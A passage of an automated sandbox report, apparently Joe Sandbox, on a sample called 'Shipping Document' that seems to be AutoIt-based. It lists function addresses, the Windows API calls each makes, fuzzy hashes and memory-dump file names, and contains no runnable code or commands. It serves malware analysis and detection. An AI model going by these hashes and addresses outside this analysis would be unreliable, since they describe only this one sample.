Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 91c2916b59946df85f3e5857a80521da8efb4aac2ba8e62f3d61b4ab1cf3586c
Instruction ID: 3b80809884a93bd0529bee6e41e07987703482f4c5b916c7d8faabc9926d2056
Opcode Fuzzy Hash: 91c2916b59946df85f3e5857a80521da8efb4aac2ba8e62f3d61b4ab1cf3586c
Instruction Fuzzy Hash: BD5191B5A00216EFDB11DF68CD85AAEB7B4EF48310F1044A9E985BB351CB75AE40CF90

Function 0101F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0101F3F7
VariantClear.OLEAUT32(00000013), ref: 0101F469
VariantClear.OLEAUT32(00000000), ref: 0101F4C4
_memmove.LIBCMT ref: 0101F4EE
VariantClear.OLEAUT32(?), ref: 0101F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0101F569

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 4c9f06770592c76e9b534734b8fb2d75d4b5a36fe7d3f008b5b2d62032abe36b
Instruction ID: ff4af890363c013e85e3d0ae7334ab92d38f78db92d30cbd59a113ac1fc77295
Opcode Fuzzy Hash: 4c9f06770592c76e9b534734b8fb2d75d4b5a36fe7d3f008b5b2d62032abe36b
Instruction Fuzzy Hash: 06516BB5A0020AEFDB10CF58D880AAABBF8FF4C354B158159EA59DB305D734E915CBA0

Function 010226F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01022747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01022792
IsMenu.USER32(00000000), ref: 010227B2
CreatePopupMenu.USER32 ref: 010227E6
GetMenuItemCount.USER32(000000FF), ref: 01022844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 01022875

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 65ccbe77380544e641ce0319b0b9264957128e5676cbccc4dd355ba75f2fbe52
Instruction ID: 64d06b8263bd2029d2f2dba0205cc56ebefabfb071a047e4de6743d0bd4a3b06
Opcode Fuzzy Hash: 65ccbe77380544e641ce0319b0b9264957128e5676cbccc4dd355ba75f2fbe52
Instruction Fuzzy Hash: A951B170A0136ADFDF25CFA8C988AAEBBF4BF44314F104299F9919B291D7B0D544CB51

Function 00FC1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00FC179A
GetWindowRect.USER32(?,?), ref: 00FC17FE
ScreenToClient.USER32(?,?), ref: 00FC181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00FC182C
EndPaint.USER32(?,?), ref: 00FC1876

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: e30e193eef2508825a69883a706d730958dd6baf06c25d5fb8c6018fe492ba1d
Instruction ID: b287fe06997c3b0da90ece751c302ce143501b5d8a1a6dac318d2a83a03789bb
Opcode Fuzzy Hash: e30e193eef2508825a69883a706d730958dd6baf06c25d5fb8c6018fe492ba1d
Instruction Fuzzy Hash: 9B41A0B1508302DFD720DF24C985FBA7BE8FB4A724F14066CF9D4861A2C73A9855EB61

Function 0104B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(010867B0,00000000,011D5DD8,?,?,010867B0,?,0104B862,?,?), ref: 0104B9CC
EnableWindow.USER32(00000000,00000000), ref: 0104B9F0
ShowWindow.USER32(010867B0,00000000,011D5DD8,?,?,010867B0,?,0104B862,?,?), ref: 0104BA50
ShowWindow.USER32(00000000,00000004,?,0104B862,?,?), ref: 0104BA62
EnableWindow.USER32(00000000,00000001), ref: 0104BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0104BAA9

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 75627b7d0907d1216d6fabab5f1f81a161a56d45a3dfc1076e9eda7b247acce4
Instruction ID: 4b5eef2e60a8930355a746663b88afe123f8779bbe97e304b625ea0d6e4a6e02
Opcode Fuzzy Hash: 75627b7d0907d1216d6fabab5f1f81a161a56d45a3dfc1076e9eda7b247acce4
Instruction Fuzzy Hash: 694153B4600241AFDB62DF2CC5C9BA57FE0BB09315F1841F9EA888F2A6C731E855CB51

Function 010373B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,01035134,?,?,00000000,00000001), ref: 010373BF

Part of subcall function 01033C94: GetWindowRect.USER32(?,?), ref: 01033CA7

GetDesktopWindow.USER32 ref: 010373E9
GetWindowRect.USER32(00000000), ref: 010373F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 01037422

Part of subcall function 010254E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0102555E

GetCursorPos.USER32(?), ref: 0103744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 010374AC

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 40e5cc30a1450cb7859aef050eac4fa1025fa91148e9b8e5e1cfd319c7c374ae
Instruction ID: 841e63fbfec329b87f3fe31bb3ca1e3ff4f044ea50e14f3a1cfe2cbbb0811074
Opcode Fuzzy Hash: 40e5cc30a1450cb7859aef050eac4fa1025fa91148e9b8e5e1cfd319c7c374ae
Instruction Fuzzy Hash: E031B0B2504316ABD720DF58D888F9BBBE9FF98314F004919F9D997181CB75E908CB92

Function 01018D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 010185F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01018608
Part of subcall function 010185F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01018612
Part of subcall function 010185F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01018621
Part of subcall function 010185F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01018628
Part of subcall function 010185F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0101863E

GetLengthSid.ADVAPI32(?,00000000,01018977), ref: 01018DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 01018DB8
HeapAlloc.KERNEL32(00000000), ref: 01018DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 01018DD8
GetProcessHeap.KERNEL32(00000000,00000000,01018977), ref: 01018DEC
HeapFree.KERNEL32(00000000), ref: 01018DF3

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 326859dbdbf857ba19bb27a3dd29e5d2558cc029278360ccf2881a3c31fa7fa5
Instruction ID: 723fe7897d3460fbb7d73b82a97e7341cc36d854ef7044fdde410740c963fceb
Opcode Fuzzy Hash: 326859dbdbf857ba19bb27a3dd29e5d2558cc029278360ccf2881a3c31fa7fa5
Instruction Fuzzy Hash: 9A11E175500606FFDB60AFA8CD88BAE7BA9EF51315F50805AF9C597208C73A9A00CB60

Function 01018AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 01018B2A
OpenProcessToken.ADVAPI32(00000000), ref: 01018B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 01018B40
CloseHandle.KERNEL32(00000004), ref: 01018B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01018B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 01018B8E

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 19dab303adb77ed1158703333b5d20bc9abcf937607faafa44a61fb1cf761a8e
Instruction ID: 1179b1785e6d6f1b8a18b5c994680f20cb9ac251dd67e1ccebca0f785a1e2049
Opcode Fuzzy Hash: 19dab303adb77ed1158703333b5d20bc9abcf937607faafa44a61fb1cf761a8e
Instruction Fuzzy Hash: EA111DB650120AABEB118F98ED89FDA7BE9FB45304F044055FE44A2154C27A9E609B60

Function 0104C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00FC12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FC134D
Part of subcall function 00FC12F3: SelectObject.GDI32(?,00000000), ref: 00FC135C
Part of subcall function 00FC12F3: BeginPath.GDI32(?), ref: 00FC1373
Part of subcall function 00FC12F3: SelectObject.GDI32(?,00000000), ref: 00FC139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0104C1C4
LineTo.GDI32(00000000,00000003,?), ref: 0104C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0104C1E6
LineTo.GDI32(00000000,00000000,?), ref: 0104C1F6
EndPath.GDI32(00000000), ref: 0104C206
StrokePath.GDI32(00000000), ref: 0104C216

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: cf29c2c1f10918e90d6f3f0b07c64de7dc4859fe3fa0f9c2c0fe89c65bb7311c
Instruction ID: 91da79ab4b8c95d7388c69213b0fe3639adfec00a583c6122065f46010fe5090
Opcode Fuzzy Hash: cf29c2c1f10918e90d6f3f0b07c64de7dc4859fe3fa0f9c2c0fe89c65bb7311c
Instruction Fuzzy Hash: 0D115EB600010DBFEF219F94DD88FDA3FACEB04354F048021BA8846165C7769D54DBA0

Function 00FE03A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FE03D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 00FE03DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FE03E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FE03F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00FE03F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FE0401

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: c246b060f32b71d6900534dba0d7e1e49e82d77212d56a50eb9fcc3cc262a4f3
Instruction ID: f38200f2867656847c097720d73222093864512debc349775a3d42b0e966fc47
Opcode Fuzzy Hash: c246b060f32b71d6900534dba0d7e1e49e82d77212d56a50eb9fcc3cc262a4f3
Instruction Fuzzy Hash: 79016CB090275A7DE3009F6A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5

Function 0102568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0102569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 010256B1
GetWindowThreadProcessId.USER32(?,?), ref: 010256C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010256CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010256D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 010256E0

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: a52256f202aa07a51422b31774e4049f841d70cf4814ad9ecc8a9c4fcee7aa83
Instruction ID: 36433969bd43e1d5cde34f50d507174e1e1cd1e9faeb08e2a2cd941a27d3beb3
Opcode Fuzzy Hash: a52256f202aa07a51422b31774e4049f841d70cf4814ad9ecc8a9c4fcee7aa83
Instruction Fuzzy Hash: 21F09675141159BBE3315A66DD4DEEF7B7CEFCBB11F000159F940D1041D7A61A0187B5

Function 010274D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 010274E5
EnterCriticalSection.KERNEL32(?,?,00FD1044,?,?), ref: 010274F6
TerminateThread.KERNEL32(00000000,000001F6,?,00FD1044,?,?), ref: 01027503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FD1044,?,?), ref: 01027510

Part of subcall function 01026ED7: CloseHandle.KERNEL32(00000000,?,0102751D,?,00FD1044,?,?), ref: 01026EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 01027523
LeaveCriticalSection.KERNEL32(?,?,00FD1044,?,?), ref: 0102752A

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: b96826a039c76c010020ae4038ee5bb8685a2974df09002b6c9959224d4c0a2d
Instruction ID: 281f3e3bd1c684536e971130f14ebb0eb1e1aa94050f39c793b8cddb65c50377
Opcode Fuzzy Hash: b96826a039c76c010020ae4038ee5bb8685a2974df09002b6c9959224d4c0a2d
Instruction Fuzzy Hash: 41F054BE540623ABEB212B68FFCC9DB7B69EF45302B000561F682910A8CB7A5401CB50

Function 01018E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 01018E7F
UnloadUserProfile.USERENV(?,?), ref: 01018E8B
CloseHandle.KERNEL32(?), ref: 01018E94
CloseHandle.KERNEL32(?), ref: 01018E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 01018EA5
HeapFree.KERNEL32(00000000), ref: 01018EAC

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 625c63b03d8432b702a7b0529286dfceeee090e5ce680978e1c1777cb92f9049
Instruction ID: 90cf2ae884b947986d0168f10d42123af3509f03be4b074c3b7eb5fe976aba35
Opcode Fuzzy Hash: 625c63b03d8432b702a7b0529286dfceeee090e5ce680978e1c1777cb92f9049
Instruction Fuzzy Hash: 14E0EDBA004002BBD7112FE9EE4C906BFB9FF897227108220F255C1478CB3B5420DB50

Function 01038902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01038928
CharUpperBuffW.USER32(?,?), ref: 01038A37
VariantClear.OLEAUT32(?), ref: 01038BAF

Part of subcall function 01027804: VariantInit.OLEAUT32(00000000), ref: 01027844
Part of subcall function 01027804: VariantCopy.OLEAUT32(00000000,?), ref: 0102784D
Part of subcall function 01027804: VariantClear.OLEAUT32(00000000), ref: 01027859

Strings

Incorrect Parameter format, xrefs: 01038960, 01038B22
AUTOIT.ERROR, xrefs: 01038A3D

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 173149758d68c6cc7c3b73e4695708629e08eff8cd36e453788558a04de7d0be
Instruction ID: ae932d8ea845bee59c7747cff017f64611d9dd802d925d5e6a7d27de8c8ff714
Opcode Fuzzy Hash: 173149758d68c6cc7c3b73e4695708629e08eff8cd36e453788558a04de7d0be
Instruction Fuzzy Hash: E5919F74608302DFC714DF28C58595ABBE8EFC8714F048AAEF89A8B351DB35E945CB52

Function 01022F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FDFEC6: _wcscpy.LIBCMT ref: 00FDFEE9

_memset.LIBCMT ref: 01023077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 010230A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01023159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 01023187

Strings

0, xrefs: 01023063

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 2c288c315af29eeec901389e69ca354e7c26770783f8faf859e98a36ec875721
Instruction ID: 2333f6fbc83c90d96f63b26b457a94ae6e3475f2f003fda915c10f10bec2094f
Opcode Fuzzy Hash: 2c288c315af29eeec901389e69ca354e7c26770783f8faf859e98a36ec875721
Instruction Fuzzy Hash: 615102316083219BE7A59E28C845B6BBBF4FF48310F140A6DFAC5DB191DB79C9448792

Function 0101DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0101DAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0101DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0101DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0101DB8E

Strings

DllGetClassObject, xrefs: 0101DB01

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: ee361bc0681ade029ec7ab610bdb6f4fe4069748288ea0bdbaaaf0a05e722e63
Instruction ID: 29b97b28310d5d646912861f49f00d17d20b8f68b53063261905133e8d34dc02
Opcode Fuzzy Hash: ee361bc0681ade029ec7ab610bdb6f4fe4069748288ea0bdbaaaf0a05e722e63
Instruction Fuzzy Hash: 534185B1600209EFDB15CF99C8C8A9A7BF9FF44314F04819DAE469F209D7B5D940CBA0

Function 01022C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 01022CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 01022CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 01022D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01086890,00000000), ref: 01022D5A

Strings

